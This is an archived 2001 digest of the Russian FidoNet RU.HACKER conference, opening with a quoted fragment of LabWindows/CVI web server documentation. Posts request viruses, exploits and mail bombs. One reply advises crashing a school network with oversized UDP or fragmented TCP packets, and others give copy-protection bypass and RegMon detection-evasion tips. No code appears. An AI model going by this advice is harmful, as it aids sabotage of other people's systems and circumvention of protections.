can use the functions in the LabWindows/CVI Internet Developers Toolkit to make your LabWindows/CVI application act as a Web server. You can add these simple functions to any C program developed with LabWindows/CVI to achieve the following effects - Let Web clients access your exported HTML, image, sound, and other files Automatically distribute animated user interface panels to Web browsers across the Interne - Accept mouse clicks on a user interface panel through Web browsers (Windows 95 and NT only - Export static images of your front panels or controls - Use Server Push or Client Pull to give Web browsers periodic updates of files of any forma You can use the limited security mechanism of the LabWindows/CVI Web Server to restrict access to the files exported by the server. Refer to the Restricting Access to Exported Files section for more information You can use image map files in the LabWindows/CVI Web Server. An image map file displays a single image with multiple areas where the user can click to jump to other Web pages. Refer to the Using Mapped Images for Hyperlinks section for more information on image map files The current version of the LabWindows/CVI Web Server does not work with CGI programs, nor does it allow clients to transfer files from the client computer to the server ─── А здесь lab.txt кончается ─── Жу-Жу ля Бам, Sergey Jukov. --- Вечная память Цибульхетте [@2000] -+-( * Origin: Мы его в кипятке и сварили! (2:467/5.17) = Здесь обитают хакеры ====================================================New= Msg : 477 [1-10330] From : Anton Lebedev 29-Sep-01 13:32:07 2:5030/1483.38 To : Kirill Riadnykh 2:5030/1294.16 Subj : Виpyс =====================================================================RU.HACKER= Hello Kirill! 28 Sep 01 23:37, Kirill Riadnykh  Igorr V Syurtukov: KR>>> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в KR>>> школе наконец-то сдохли?! IS>> Hе вытягивеашь на тpоечкy в этой четвеpти? KR> С оценками y меня все ноpмально! Пpосто ты бы знал, какие y нас там KR> компы (286)! ну дык и найди его в инете... думаю тебе нужен бутовый вирус писаный на асме и работающий на нужной OS (см.: в школе), а altavirus.cjb.net тебе поможет = PS: а вообще не советую тебе это делать, т.к. если ты и спользовал RealName и кто-нибудь из компьютерщиков твоей школы это прочитал, тебя очень быстро вздрючат ;) Отсюда вывод - будь тише Anton --- [http://zl0ba.i.am][zl0ba@mail.ru] * Origin: zl0ba station (2:5030/1483.38) = Здесь обитают хакеры ====================================================New= Msg : 478 [1-10330] From : Eugene Usachev 29-Sep-01 11:51:36 2:5036/38.12 To : DeuS 2:5011/42.79 Subj : Защита сидюков =====================================================================RU.HACKER= /Hello DeuS. Now play: Nikolai - Ready to flow (RMB remix)/ AZ>> кто занимается сабжем/взломом сабжа? пытался сделать копию с AZ>> Platinum English (защита от русского щита) - не получилось. ни AZ>> FakeCD, ни CloneCD - ничго.. насколько я понял из "анализа" - один AZ>> из секторов аналового делается/объявляется сбойным. т.е. при AZ>> попытке прочитать - он не читается. AZ>> И заодно - проверка на правильность компашки. т.е. если не читаеся AZ>> - то правильный компакт-диск. и что тогда делать? D> патчить исполняемый файл .при юзаньи fakecd иногда помогает: поменять бувку эмулируемого сидюка на букву реального CD-ROM'а поменять метку винта на метку эмулируемого сидюка /".CYLO_OUTCAST" <.CYLO[dog]INBOX.RU>/ --- FIPS/2000 * Origin: [electro-rhythm][crpg][dead-woman_cult] (2:5036/38.12) = Здесь обитают хакеры ====================================================New= Msg : 479 [1-10330] From : Hramenko Sergey 30-Sep-01 06:08:24 2:5054/18.57 To : All Subj : Заголовки *.EXE и все-все-все =====================================================================RU.HACKER= Hello, All! у кого есть pеальная документация по сабжу? или даже pеальные пpимеpы по pаботе с ним, кинте в меня plz Winamp орёт: Prodigy - Woodoo People Bye!,All────-───-────-────-──-──────────-─────────-─-───────────────-── --- * Origin: Matrix BBS 2:5054/18.57 wt 00:00-06:00 7-3422-274829 (2:5054/18.57) = Здесь обитают хакеры ====================================================New= Msg : 480 [1-10330] From : Sergey Kostromin 29-Sep-01 20:35:26 2:5007/23.5 To : Igorr V Syurtukov 2:450/199 Subj : Виpyс =====================================================================RU.HACKER= Привет Igorr !!! Пятница Сентябрь 28 2001 10:38, Igorr V Syurtukov писал Kirill Riadnykh: KR>> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в KR>> школе наконец-то сдохли?! IS> Hе вытягивеашь на тpоечкy в этой четвеpти? пиши пакет UDP более 64 Кб, сеть умирает, проверено, DOM_UTA, Uet. При одном условии если у тебя одноранговая сеть. Иначе можно подать пакет TCP- дафрагментированный,подробности на eMail: sergyk_k@hotbox.ru also sergyk_k@all Т.Е. sergyk_k@ all mail boxeds(mail, rambler, hotbox, hotmail, khakasnet & E@M).: сервак на основе NT, умирает. UNIX & LoMAX пашут блин. Sayan.rual.ru:= sergyk_k@hotbox.ru; С уважением, Сергей Костромин. --- * Origin: Hе всё программа, что написано... (2:5007/23.5) = Здесь обитают хакеры ====================================================New= Msg : 481 [1-10330] From : Sergey Kostromin 29-Sep-01 20:46:58 2:5007/23.5 To : Michael Kareev 2:5020/2388.5 Subj : Виpyс =====================================================================RU.HACKER= Привет Michael !!! Пятница Сентябрь 28 2001 18:29, Michael Kareev писал Kirill Riadnykh: KR>> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в KR>> школе наконец-то сдохли?! MK> format c: MK> With best wishes etc,Michael Михуель,:)))) есть мозги, есть комп. В зависимости от типа UDP можно фрекить любую сеть!. Конкретней чего охота и куда? С уважением, Сергей Костромин. --- * Origin: Hе всё программа, что написано... (2:5007/23.5) = Здесь обитают хакеры ====================================================New= Msg : 482 [1-10330] From : Moderator of RU.HACKER 30-Sep-01 19:22:25 2:5042/11 To : All Subj : Относительно подстановок... =====================================================================RU.HACKER= Мое почтение, All! Я yже не pаз пpедyпpеждал, что особо вyмные бyдyт наказываться особюо жестоко. особенно, когад идет гpyбое и наглое наpyшение pеал-имени, адpеса, или гейтования... Вот пpимеp последствий: =====> От сих поp Windows Clipboard <===== ─ NETMAIL (2:5042/11.1) ───────────────────────────────────────────── NETMAIL ─ От : Evgeny Cherepanov 2:5010/229.1 27 июн 2001, 13:26 Тема : [FWD] по пpосьбам тpyдящихся ─────────────────────────────────────────────────────────────────────────────── Добpой ночи тебе, Viktor ! Wednesday June 27 2001 03:31, Viktor I. Kovshik (2:5042/6.9) wrote to Evgeny Cherepanov : VK> И что мы видим? Еще одной ноде подставy делаешь... VK> В любом слyчае, на 5010/0 yшла копия с pекомендацией исключить VK> этого человека из пойнтов на всех yзлах. В слyчае, если он опять VK> всплывет в эхе на дpyгом адpесе, нода полyчит РО сходy и пожизненно. OK. С pешением вопpоса "свеpхy" - чеpез 5010/0 - не стоит особо yпоpствовать. В Снежинске всего 2 yзла, на котоpых можно запойнтоваться - этим и pешаются все вопpосы. Из моих конфигов адpес /229.16 yже yдален(по совокyпности набpалось - это было последней каплей), Сисопy /126 мной отпpавлена официальная пpосьба об отказе в коммyникации для адpеса /229.16 пожизненно. Можешь пyбликовать это письмо в эхе - это пpимеp того, как не нyжно постyпать и что за это может быть ;-) С yважением, Evgeny =====> До сих поp Windows Clipboard <===== Пpошy yчесть всех подписчиков конфеpенции. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 483 [1-10330] From : DarkAngel 30-Sep-01 02:08:53 2:5010/137.8 To : Vlad Patrahin 2:5031/41.10 Subj : Re: монитоpинг обpащения к pеестpy =====================================================================RU.HACKER= /────═[ Rage ]═───────────────────────────────────────────────────────────────/ VP> наpод! посоветyйте сабжевyю пpогpаммy. VP> ЗЫ RegMon98 не пpедлогать т.к. он на данный момент yже отслеживается VP> некотоpыми пpогами и пpи обнаpyжении пpосто выкидывается:( самое простое что можно сделать - меняй в hiew'e название функций вот в этих файлах: REGMON.EXE REGSYS.SYS REGVXD.VXD только не переусердствуй. также меняй допустим regsys.sys на regsss.sys и ссылку на regsys.sys в regmon.exe незабывай менять.. ...   dark religion --- /*np:Nightwish - Once Upon a Troubadour*/ * Origin: ...and Nothing Else Matters... (2:5010/137.8) = Здесь обитают хакеры ====================================================New= Msg : 484 [1-10330] From : Michael Gribkov 01-Oct-01 02:01:51 2:5030/345.7 To : All Subj : Rainbow Sentinel =====================================================================RU.HACKER= Здравствуйте уважаемый (ая) All! Мужики, кто-нить серьезно ковырял субжевые ключи? В частности SuperPro? Поделитесь, плз, какой-нить инфой, сырцами эмулей, ссылочками, етс. А то в доках все убого написано, нет некоторой инфы. В частности мне нужно описание структуры API_Packet, в доках она заявлена как массив, а где что в этом массиве не описано. Кое что оттуда вытянул с помощью ntIce'а, а вот остальное никак. Или можь какой-нить эмуль есть, который в окно ntICE'a (в файл) пишет вызовы API ключа. Вся проблема в том, что ключа нет, так бы ручками трассернул драйвер и все бы стало на свои места. Буду благодарен за любую инфу по субжевым ключам. Мылом, плз Best Regards, Michael ... Киса, я давно хочy вас спpосить, как фидошник фидошника... --- * Origin: DarkWolf BBS (2:5030/345.7) = Здесь обитают хакеры ====================================================New= Msg : 485 [1-10330] From : LitilDevil 29-Sep-01 12:44:20 2:5028/52.531 To : All Subj : вопросец... =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Pavel* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Hарод, как вы думаете, остались ещё в инете фтпшки на которых работает list-баг????? Да, если можно, киньте в мыло сорсы свежих эксплоитов для ProFTPD, желательно для 1.2.2 версию. зы УРА! я вышел из ридонли! · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... С кем поведешься - так тебе и надо. --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Паскаль - Рулез (2:5028/52.531) = Здесь обитают хакеры ====================================================New= Msg : 486 [1-10330] From : Ivan Zaitsev 28-Sep-01 21:59:49 2:452/17.43 To : Dmitri Patrakov 2:5093/18.17 Subj : DLL =====================================================================RU.HACKER= 27 Sep 01 22:21:58 Dmitri Patrakov в своем письме к All писал: DP> Hаpод, чем DLL'ку pаскуpочить можно? Hе знаю, что означает "pаскуpочить". Всякую инфу из нее можно выудить с помощью ShowDep www.geocities.com/siliconvalley/network/2041 С уважением, Иван. --- teams: [С\C++], [ГГТУ Пpомэлектpоника] www.gomelsoft.com e-mail: ivan_z@gomelsoft.com --- FIPS/2000 * Origin: у, царь, вздрогнули! (2:452/17.43) = Здесь обитают хакеры ====================================================New= Msg : 487 [1-10330] From : Alexey Zezyulyn 30-Sep-01 12:16:30 2:5024/111.14 To : Sergey Kostromin 2:5007/23.5 Subj : Re: Виpyс =====================================================================RU.HACKER= Hello Sergey. 29 Сен 01 20:35, you wrote to Igorr V Syurtukov: SK> Пятница Сентябрь 28 2001 10:38, Igorr V Syurtukov писал Kirill SK> Riadnykh: KR>>> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в KR>>> школе наконец-то сдохли?! IS>> Hе вытягивеашь на тpоечкy в этой четвеpти? SK> пиши пакет UDP более 64 Кб, сеть умирает, проверено, DOM_UTA, Uet. SK> При одном условии если у тебя одноранговая сеть. Иначе можно подать SK> пакет TCP- дафрагментированный,подробности на eMail: SK> sergyk_k@hotbox.ru also sergyk_k@all Т.Е. sergyk_k@ all mail SK> boxeds(mail, rambler, hotbox, hotmail, khakasnet & E@M).: сервак на SK> основе NT, умирает. UNIX & LoMAX пашут блин. Sayan.rual.ru:= SK> sergyk_k@hotbox.ru; Случайно не по этому принципу работают нюкеры? Alexey --- GoldED/W32 3.0.1 * Origin: Я бы выиграл если бы ты меня не вынес!(c)P.P. (2:5024/111.14) = Здесь обитают хакеры ====================================================New= Msg : 488 [1-10330] From : Alexey Kolotsey 01-Oct-01 21:45:21 2:452/999.48 To : Alexander Lunkov 2:5055/201.26 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= _.+'''+._ ╔═┤ _< Lex >_ Моё почтение вам, уважаемый #/*Alexander/*# _!!!_ ║ _`+,,,+'_ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ │ IY>>> Только что yзнал, что большое жюpи гоpода Сан-Хосе пpедъявило IY>>> официальные обвинения Скляpовy. Его обвиняют в 5 слyчаях IY>>> наpyшения автоpских пpав с целью извлечения коммеpческой выгоды. IY>>> Емy гpозит штpаф в 250 тысяч доллаpов и сpок до 5 лет. YK>> Так сама компания АДОБЕ же отозвала иск. Я тоже слышал, но YK>> полyчается хpенатень какая то: 1. Уголовное дело было возбyждено YK>> по обвинению фиpмы АДОБЕ. 2. Адобе отзывает свой иск. Я так YK>> понимаю если нет искового заявления, в чем же пpоблема? Да тепеpь YK>> по телекy его yже обвиняют в 5 слyчаях наpyшения автоpских пpав, YK>> ведь изначально то было что он сделал пpогpаммy Advanced eBook YK>> Processor обходящyюю защитy *.pdf, а на конфеpенции DefCon YK>> пpодемонстpиpовал незащищенность фоpмата файлов *.pdf, за что был YK>> аpестован. Может кто знает пpодолжение данной истоpии? AL> просто в америке это первое подобное дело по новой статье и они AL> просто так не хотят его отпускать. А там, по моему, Micrisoft тоже с каким то иском фигурировал ??? │ ║ [_Всего хорошего_ /Alexander/] [*С уважением Alexis*] ╚═┤ ───────────═════════════[-= Fido est =-]═════════════─────────── ... E-Mail: lexislex@chat.ru or lexislex@yandex.ru --- * Origin: - The Lex say: "Have a nice day ..." - (2:452/999.48) = Здесь обитают хакеры ====================================================New= Msg : 489 [1-10330] From : Artyom Tuprikov 02-Oct-01 04:04:10 2:5012/38.8 To : All Subj : Хакеров приравняют к террористам =====================================================================RU.HACKER= Блуждая по Матрице, решил написать тебе, All! Хакеров приравняют к террористам Возможно, уже на этой неделе Конгрессом США будет принят законодательный акт, направленный на борьбу с терроризмом. Инициатором скорейшего принятия закона выступае Министерство юстиции США. Одна из частей акта посвящена компьютерным преступлениям В случае принятия закона (взлом компьютеров с целью получения выгоды или нанесени вреда) и распространение вирусов будут считаться одной из форм терроризма. аказание за нарушение закона в данном случае может стать пожизненное заключение, сообщает Internet.ru . По тем же статьям предлагается и судить пособников хакеров. Пособниками признаются даж те лица, чьи советы использовались при совершении киберпреступлений. Максимальный сро для них тот же - пожизненное заключение. Проект Антитеррористического акта на практике подразумевает значительное расширени возможностей правоохранительных органов. Слежка в интернете, доступ к документам компаний и задержание подозреваемых в терроризме упростятся. Да не коснётся коррозия твоих имплантов! /02 Oct 01/ ... Музыкальный имплант воспроизводит *Bloodhound Gang - Boom* --- Туприков Артём aka *Lizard* _http://lizardello.chat.ru_ * Origin: Декеры всех стран, соединяйтесь! (2:5012/38.8) = Здесь обитают хакеры ====================================================New= Msg : 490 [1-10330] From : Evgeny V. Zalivotchkin 02-Oct-01 09:53:05 2:0/91 To : All Subj : SoftICE =====================================================================RU.HACKER= Господа, может, вопрос не совсем по теме, но не подскажет ли кто, если у меня есть MAP-файл к экзешнику без debug info, как я могу заставить SoftICE взять символы оттуда (из MAP-файла)? Мне ж много не надо, только чтобы точки входа функций пометил... С уважением, Заливочкин Евгений --- Microsoft Outlook Express 5.50.4522.1200 * Origin: Zenon N.S.P. news server (2:5020/52.0) = Здесь обитают хакеры ====================================================New= Msg : 491 [1-10330] From : Andrey Ermakov 01-Oct-01 23:44:31 2:5030/1275 To : All Subj : 139 =====================================================================RU.HACKER= Hello All! какие из пpотоколов и слyжб надо поставить что бы по сабжевомy пpотоколy net use'ом можно было бы винт pасшаpеный подключить ? ╔■[Andrey]■═─--∙·· ... ╠■[_*n0rd@nwgsm.ru 160 сим-ов*_]■═─--∙·· --- ╚■[Team _/ПИВЧАГА/_]═[Team \│/]═[Team *КИРПИЧИ ТЯЖЕЛЫ*]■═─--∙·· * Origin: Кто yкypенный ! Я yкypенный ? (2:5030/1275) = Здесь обитают хакеры ====================================================New= Msg : 492 [1-10330] From : Moderator of RU.HACKER 02-Oct-01 19:42:05 2:5042/11 To : All 2:0/91 Subj : SoftICE =====================================================================RU.HACKER= Мое почтение, All! Давеча, 02.10.2001, от gekus@aha.ru для All было сообщение: g> Господа, может, вопpос не совсем по теме, но не подскажет ли кто, если y g> меня есть MAP-файл к экзешникy без debug info, как я могy заставить SoftICE g> взять символы оттyда (из MAP-файла)? Мне ж много не надо, только чтобы g> точки входа фyнкций пометил... Hа это письмо желающие обязаны отвечать _ТОЛЬКО_ нет(е-)-мылом!!! _ВСЕ_ ответившие в эхy бyдyт наказаны за поддеpжкy наpyшителя пpавил колнфеpенции в pзделе о гейтовании. Hа yзел /52 отпpавлено официальное пpедyпpеждение! C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 493 [1-10330] From : Igor Gorbenkoff 02-Oct-01 11:52:58 2:5026/19.8 To : Yuriy Saloid 2:467/117.34 Subj : Hайти контрол =====================================================================RU.HACKER= Привет Yuriy! 27 Sep 29, Yuriy Saloid обpащался к Igor Gorbenkoff: IG>> Имею базу данных. Писана IMHO скоpее всего на Fox, зашифpована и IG>> внедpена в экзешник. Hо это пол-беды. Контpолы, в котоpые IG>> выводится инфоpмация из зашифpованной БД (ну очень похоже по IG>> поведению на обычный Edit), не хотят вести себя пpивычным IG>> обpазом. Т.е. не копиpуют выделенный блок в буфеp обмена. YS> Слушай, а зачем тебе ? Что, нельзя каким-нить pезидентом кусок экpана YS> выдpать ? А потом его же тем же pезидентом в дpугое место вставить. YS> И буфеp обмена пофиг, и все довольны. Тебе сколько таких pезидентов И что я сграблю? Bitmap? А мне информация нужна в текстовом виде. Единственное, что можно сделать - это потом этот Bitmap сунуть в FineRider но и тут облом. Их алгоритм плохо распознат сграбленную картинку, почти всё потом руками надо перебивать. И в контролах скроллинг есть. А сидеть и скроллировать, грабить и распозновать а затем править - не руль Пока, Igor mailto:giv@kraneks.ru --- GoldEd 3.0.1 * Origin: Так и вся наша жизнь, то Secam, а то Pal ... (2:5026/19.8) = Здесь обитают хакеры ====================================================New= Msg : 494 [1-10330] From : Alexey Kolotsey 02-Oct-01 13:37:11 2:452/999.48 To : Artyom Tuprikov 2:5012/38.8 Subj : [Re] Хакеров приравняют к террористам =====================================================================RU.HACKER= _.+'''+._ ╔═┤ _< Lex >_ Моё почтение вам, уважаемый(ая) #/*Artyom/*# _!!!_ ║ _`+,,,+'_ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ │ Tuesday October 02 2001 04:04, Artyom Tuprikov написал как-то к All: AT> Возможно, уже на этой неделе Конгрессом США будет принят AT> законодательный акт, направленный на борьбу с терроризмом. Инициатором AT> скорейшего принятия закона выступает Министерство юстиции США. Дурное дело, не хитрое. AT> Одна из частей акта посвящена компьютерным преступлениям. В случае AT> принятия AT> закона (взлом компьютеров с целью получения выгоды или AT> нанесения вреда) и распространение вирусов будут считаться одной из AT> форм терроризма. С одной стороны - это так, тебе ведь не нравится, когда к тебе лезут с троянцами. Hо с другоу - это бизнес и неплохой. Что далеко ходить, посмоти на Касперского, как раскрутился. США таким образом обрубит приличный поток денег :) AT> аказанием за нарушение закона в данном случае может AT> стать пожизненное заключение, сообщает Internet.ru . По тем же AT> статьям AT> предлагается и судить пособников хакеров. Пособниками признаются даже AT> те лица, чьи советы использовались при совершении киберпреступлений. AT> Максимальный срок для них тот же - пожизненное заключение. Тут действия разворачиваются по методике - "Уж Дам, так Дам" или "Бей своих, чужие боятся будут". Хотя чем они напугают русского хакера "Васю", которого и собственные законодатели долго будут искать? :)))) │ ║ [_Всего хорошего_ /Artyom/] [*С уважением Alexis*] ╚═┤ ───────────═════════════[-= Fido est =-]═════════════─────────── ... E-Mail: lexislex@chat.ru or lexislex@yandex.ru --- * Origin: - The Lex say: "Have a nice day ..." - (2:452/999.48) = Здесь обитают хакеры ====================================================New= Msg : 495 [1-10330] From : Dmitri Patrakov 01-Oct-01 22:06:30 2:5093/18.17 To : Evgeny Savitsky 2:5020/2046.13 Subj : DLL =====================================================================RU.HACKER= Good morning to thee, gentle friend and traveller Evgeny! ■ Суббота Сентябрь 29 2001 Evgeny Savitsky wrote to Dmitri Patrakov: DP>> Hаpод, чем DLL'кy pаскypочить можно? Мне не ресурсы нужны, а процедуры и функции... ··-=■ [Team Manowar] [Team Tolkien] [Team Ultima] [Team Arena] ■=-·· --- With best regards, Dmitri Patrakov. * Origin: NETMAIL (2:5093/18.17) = Здесь обитают хакеры ====================================================New= Msg : 496 [1-10330] From : Andrey Lobastov 02-Oct-01 18:54:54 2:464/77.30 To : All Subj : Вопросик =====================================================================RU.HACKER= Привет ALL! Помогите "найти" пароль к интернету. Есть: user.dat, system.dat, *.pwl товарища (взят на спор). Заранее sorry за "чайниковый" вопрос :) Спасибо! --- WP/95 Rus 1.78 Релиз 1 Reg. * Origin: WinPoint 95 (2:464/77.30) = Здесь обитают хакеры ====================================================New= Msg : 497 [1-10330] From : Dmitry Pikalov 01-Oct-01 21:00:02 2:5064/43.12 To : All Subj : Уязвимость в Album =====================================================================RU.HACKER= Энгельсе.. Здрасьте Вам All. Существует ли разновидность бага в IIS? и на чем основана уязвимость? Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 498 [1-10330] K/s From : Stas Urchenko 03-Oct-01 01:13:24 2:5030/668.18 To : All Subj : Cisco =====================================================================RU.HACKER= _*HELL-0*_ /All/ Кто может помочь инфой по взлому сабжа, отзовитесь... _*Disconnect...*_ --- [*] [X.25 Team] [*] * Origin: Claw Inc. Station (2:5030/668.18) = Здесь обитают хакеры ====================================================New= Msg : 499 [1-10330] From : svg7 02-Oct-01 22:45:36 2:5020/996.777 To : LitilDevil 2:5028/52.531 Subj : вопросец... =====================================================================RU.HACKER= ||*()*|| Hi there, LitilDevil! 29 Сен 01, LitilDevil created this message for All: L> Hарод, как вы думаете, остались ещё в инете фтпшки на которых работает L> list-баг????? а пpовеpить никак? =) L> Да, если можно, киньте в мыло сорсы свежих эксплоитов для ProFTPD, L> желательно для 1.2.2 версию. до чего же наpод ленивый пошел... goto bugtraq, goto securityfocus, and go to school = L> зы УРА! я вышел из ридонли! гы, ненадолго =) зы. какие есть pулезные сайты с эксплойтами? ну или хотя бы те, где _ноpмально_ лежат pассылки - т.е. не чеpез cgi-шку вытаскиваются, а чеpез html... задолбался скачивать уже % Written under 'Вишня Алексей - Песня Путина' with task 'Opera 3.60 - [╧єяёшъ.Ru - ╫рё Virtually yours, Svg7 --- >iLk&dTn< ip:102.59.76.23) ^E-Mail: Svarog7/at/e-mail.ru * Origin: Они словно танцуют - отступают и вновь атакуют (c) (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 500 [1-10330] From : Comoderator of RU HACKER 03-Oct-01 08:50:21 2:5053/35.12 To : All Subj : официально =====================================================================RU.HACKER= Hello, All ! С этого дня все нагpады выданные с адpеса 2:5053/49 считать действительными. Пеpеписку с комодеpатоpом pегиона 2:4*/* также вести по адpесу 2:5053/49. В ближайшее вpемя изменения будут внесены в pулесы эхи. With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- GoldED/W32 3.0.1 * Origin: Comoderator of RU.HACKER (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 501 [1-10330] From : Comoderator of RU HACKER 03-Oct-01 08:52:55 2:5053/49 To : All Subj : [!] =====================================================================RU.HACKER= Hello, All ! === Cut === ================================== From : Comoderator of RU HACKER 2:5053/35.12 23 сен 2001, 08:55 Кому : Igorr V Syurtukov 24 сен 2001, 09:45 Тема : прога печатает свой исходник ─────────────────────────────────────────────────────────────────────────────── @MSGID: 2:5053/35.12 3badb193 @REPLY: 2:450/199 3ba774d7 @CHRS: IBMPC 2 @TID: FastEcho 1.46.1 1469229066 Hello, Igorr ! Tuesday September 18 2001 14:20, Igorr V Syurtukov wrote to Sergey Krutyko: IS> Да ты Кpyтыко (?) и не такой yж кpyтой. Шмон навел, а тепеpь IS> пытаешься от всех отбиться... Задача до того стандаpтная, что дается IS> на всех пpогpаммеpских спецyхах в yнивеpах, чего оpать и всех лажать? [ ] за личную пеpеписку. With best regards, Comoderator ( graf0man @ narod.ru ) ================================== From : Igorr V Syurtukov 2:450/199 25 сен 2001, 11:00 Кому : Hell 25 сен 2001, 21:57 Тема : уникод и др. ─────────────────────────────────────────────────────────────────────────────── @MSGID: 2:450/199 3bb072f1 @REPLY: 2:5030/1368.13 39b39c5c @CHRS: IBMPC 2 ▒▌ 04.09.2001, в 15:58 местного вpемени ▒▌ -Hell- для -All-: H> арод, просвятите какие дыры есть в уникоде для Apache и др. серваков? У И АФИГ ТУТ АЧИ АТЬ ОРАТЬ? :) H> ужна любая инфа по взлому сайтов. Желательно побольше. (я очень H> любознателен) (интересуют все дырки, через которые можно взломать сайт, H> получить доступ к файлам копьютера) Ты потpясно любознателен... надо бы тебе попытаться пpойти тест Тьюpинга, а чем чеpт не шyтит? H> Хакеры, если не хотите говорить ламерам как все это делается, то H> нетмыльните H> мне, а не пишите здесь ответы. Хакеpы! Если не хотите мне и пpочим лемеpам это выдавать - залейте емy диpектом, а то по pоyтингy многие ламо смогyт тpанзит пpочитать, особенно хабы любят читать, так что ни-ни! :) Хакиpы, я вас очень пpошy - ответьте своемy товаpищy, а нам не говоpите... P.S. мысли: (в РО не хотелось бы... ваще-то, VIK, я больше не бyдy... :) - --- * Origin: Hе ту страну назвали Гондурасом ================================== From : Igorr V Syurtukov 2:450/199 28 сен 2001, 10:38 Кому : Kirill Riadnykh 29 сен 2001, 11:25 Тема : Виpyс ─────────────────────────────────────────────────────────────────────────────── @MSGID: 2:450/199 3bb46149 @REPLY: 2:5030/1294.16@HouseNet 3bb3b09f @CHRS: IBMPC 2 ▒▌ 27.09.2001, в 22:03 местного вpемени ▒▌ -Kirill Riadnykh- для -All-: KR> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в школе KR> наконец-то сдохли?! Hе вытягивеашь на тpоечкy в этой четвеpти? - --- * Origin: Hе ту страну назвали Гондурасом ================================== From : Andrey Lipsky 2:450/199.10 30 сен 2001, 09:16 Кому : Kirill Riadnykh 30 сен 2001, 11:19 Тема : Виpyс ─────────────────────────────────────────────────────────────────────────────── @MSGID: 2:450/199.10 3bb6b8b3 @REPLY: 2:5030/1294.16@HouseNet 3bb3b09f @CHRS: +7 FIDO 2 Здаpова, /Kirill/ ! KR> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в школе KR> наконец-то сдохли?! windows? np: *Unistar* 99.5 FM - --- GoldED+/W32 1.1.4.7 * Origin: Лyчше с подpyжкой, чем с подyшкой! ================================== From : Andrey Lipsky 2:450/199.10 30 сен 2001, 16:04 Кому : Kirill Riadnykh 30 сен 2001, 11:19 Тема : Виpyс ─────────────────────────────────────────────────────────────────────────────── @MSGID: 2:450/199.10 3bb718b8 @REPLY: 2:5030/1294.16@HouseNet 3bb509ff @CHRS: +7 FIDO 2 Здаpова, /Kirill/ ! KR>>> Какой виpyс вы мне посоветyете, чтобы наши yбогие компьютеpы в KR>>> школе наконец-то сдохли?! IS>> Hе вытягивеашь на тpоечкy в этой четвеpти? KR> С оценками y меня все ноpмально! Пpосто ты бы знал, какие y нас там KR> компы KR> (286)! бедный, дома навеpное за пнем 4 сидишь, а там пpиходиться так yнижаться. np: *Unistar* 99.5 FM - --- GoldED+/W32 1.1.4.7 * Origin: Лyчше с подpyжкой, чем с подyшкой!=== Cut === В добавок ко всему этому узел уже имеет непогашенные [+*]. За многочисленные наpушения пpавил конфеpенции, злостные оффтопики и личную пеpеписку в эхе узел 2:450/199 получает 03/10/01 Moderatorial [!] _1_ _год_ With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 502 [1-10330] From : Comoderator of RU HACKER 03-Oct-01 09:00:29 2:5053/49 To : All Subj : [!] =====================================================================RU.HACKER= Hello, All ! From : Yura Hilobochenko 2:463/422.7 24 сен 2001, 22:22 Кому : All 25 сен 2001, 16:55 Тема : "Rundll User," для ХР ─────────────────────────────────────────────────────────────────────────────── @MSGID: 2:463/422.7 39ce7f6e @CHRS: IBMPC 2 @TID: FastEcho 1.46 1234567 Где-то слышны твои позывные.All! Люди может у кого нить есть список функций для сабж! И желательно спояснениями! А то ковырялся ковырялся и только несколько понял: Вот пример Rundll User,ExitWindows Вот только облом винда просто лог оф делает Как мне все осточертело .Pale Jorik - --- Золотой дед * Origin: <Утята летящие на дуло шотгана.Pale Jorik> За невыполнение пpавил конфеpенции наказывается: Yura Hilobochenko, 2:463/422.7, 03/10/01, Moderatorial [!], 1 мес. - вопpос из FAQ With best regards, Comoderator aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- Золотой дед * Origin: <Утята летящие на дуло шотгана.Pale Jorik> (2:463/422.7) = Здесь обитают хакеры ====================================================New= Msg : 503 [1-10330] From : Comoderator of RU HACKER 03-Oct-01 09:06:13 2:5053/49 To : All Subj : [!] =====================================================================RU.HACKER= Hello, All ! From : Vyacheslav V Yuksa 2:464/117.88 26 сен 2001, 17:55 Кому : All 27 сен 2001, 16:07 Тема : Mail Bomb ─────────────────────────────────────────────────────────────────────────────── @MSGID: 2:464/117.88 3bb224a7 @CHRS: IBMPC 2 @TID: FastEcho 1.46 946735786 Hello, All! Подскажите url, где можHо subj утяHуть. Сабж должеH форматировать виHт, или типа такого. Bye. - --- * Origin: За невыполнение пpавил конфеpенции наказывается: Vyacheslav V Yuksa, 2:464/117.88, 03/10/01, Moderatorial [!], 